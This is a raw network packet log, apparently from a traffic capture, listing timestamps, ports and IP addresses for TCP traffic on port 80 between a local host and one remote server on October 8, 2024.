Oct 8, 2024 11:30:05.685442924 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.685493946 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.685527086 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.685549021 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.685576916 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.685627937 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.685627937 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.685662031 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.685694933 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.685708046 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.685729027 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.685761929 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.685780048 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.685795069 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.685827971 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.685846090 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.685861111 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.685910940 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.685914040 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.685949087 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.685986042 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.685997963 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.686038971 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.686073065 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.686090946 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.686105967 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.686136007 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.686152935 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.686184883 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.686217070 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.686235905 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.686266899 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.686300039 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.686312914 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.686333895 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.686383963 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.686384916 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.686417103 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.686449051 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.686458111 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.686480999 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.686518908 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.686530113 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.686568022 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.686618090 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.686619997 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.686651945 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.686685085 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.686701059 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.686728954 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.686762094 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.686789989 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.686801910 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.686837912 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.686853886 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.686870098 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.686935902 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.690510035 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.690587044 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.690623999 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.690656900 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.690736055 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.690771103 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.690783024 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.690804005 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.690839052 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.690850973 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.690872908 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.690906048 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.690920115 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.690938950 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.690972090 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.690992117 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.691025019 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.691060066 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.691075087 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.691093922 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.691143990 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.691144943 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.691199064 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.691232920 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.691250086 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.691266060 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.691298962 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.691317081 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.691333055 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.691365957 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.691381931 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.691431046 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.691478968 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.691482067 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.691515923 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.691550970 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.691565990 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.691586018 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.691620111 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.691637993 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.691652060 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.691696882 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.691703081 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.691729069 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.691764116 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.691781044 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.691797972 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.691832066 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.691847086 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.691868067 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.691903114 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.691916943 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.731677055 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.756953955 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.757035017 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.757088900 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.757122993 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.757139921 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.757174969 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.757177114 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.757229090 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.757263899 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.757277012 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.757297039 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.757330894 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.757349014 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.757364988 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.757399082 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.757415056 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.757431030 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.757466078 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.757482052 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.757499933 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.757538080 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.757549047 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.757591963 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.757627964 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.757642031 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.757677078 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.757709980 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.757726908 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.757744074 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.757791996 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.757793903 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.757828951 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.757879019 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.757879972 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.757910967 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.757946014 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.757961988 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.757978916 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.758013010 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.758025885 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.758064032 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.758099079 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.758116007 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.758131981 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.758171082 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.758181095 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.758203983 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.758238077 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.758251905 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.758271933 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.758306026 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.758321047 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.774139881 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.774190903 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.774249077 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.774260998 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.774301052 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.774302959 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.774338961 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.774374008 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.774390936 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.774408102 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.774441957 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.774456024 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.774481058 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.774529934 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.774559975 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.774614096 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.774667025 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.774669886 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.774701118 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.774749994 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.774751902 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.774781942 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.774813890 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.774836063 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.774848938 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.774883986 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.774898052 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.774918079 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.774966002 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.774986982 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.775019884 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.775053978 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.775068045 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.775108099 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.775158882 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.775158882 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.775192976 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.775226116 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.775242090 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.775260925 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.775295019 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.775309086 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.775329113 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.775362015 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.775377035 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.775430918 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.775464058 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.775480986 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.775496960 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.775531054 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.775547028 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.775563002 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.775598049 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.775609016 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.775631905 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.775665998 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.775682926 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.775701046 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.775732994 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.775751114 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.775768995 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.775801897 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.775823116 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.775841951 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.775891066 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.778819084 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.778871059 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.778903961 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.778927088 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.778938055 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.778989077 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.779022932 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.779056072 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.779088974 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.779098034 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.779140949 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.779175997 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.779191017 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.779207945 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.779241085 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.779254913 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.779274940 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.779309988 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.779324055 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.779361010 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.779412985 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.779417038 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.779468060 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.779517889 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.779520988 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.779551029 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.779584885 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.779599905 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.779617071 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.779650927 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.779665947 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.779684067 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.779721022 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.779731989 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.779755116 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.779788017 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.779802084 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.779820919 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.779854059 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.779869080 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.779896021 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.779943943 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:09.222491026 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:18.628226995 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:18.633407116 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:18.633702040 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:18.633702040 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:18.638597965 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.282679081 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.282704115 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.282718897 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.282733917 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.282748938 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.282764912 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.282778978 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.282793999 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.282808065 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.282812119 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.282824993 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.282833099 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.282833099 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.282840014 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.282854080 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.282893896 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.282972097 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.283016920 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.283454895 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.283499002 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.288115025 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.288130045 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.288153887 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.288167953 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.288170099 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.288189888 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.288194895 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.288230896 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.288296938 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.288356066 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.288371086 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.288393021 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.288407087 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.288423061 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.288444042 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.289295912 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.289318085 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.289334059 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.289340973 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.289349079 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.289364100 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.289371967 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.289405107 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.290150881 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.290237904 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.290283918 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.290486097 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.292926073 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.292965889 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.293041945 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.293106079 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.293149948 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.293420076 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.293477058 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.293521881 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.293780088 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.293802977 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.293848038 CEST	49749	80	192.168.2.6	63.250.38.167
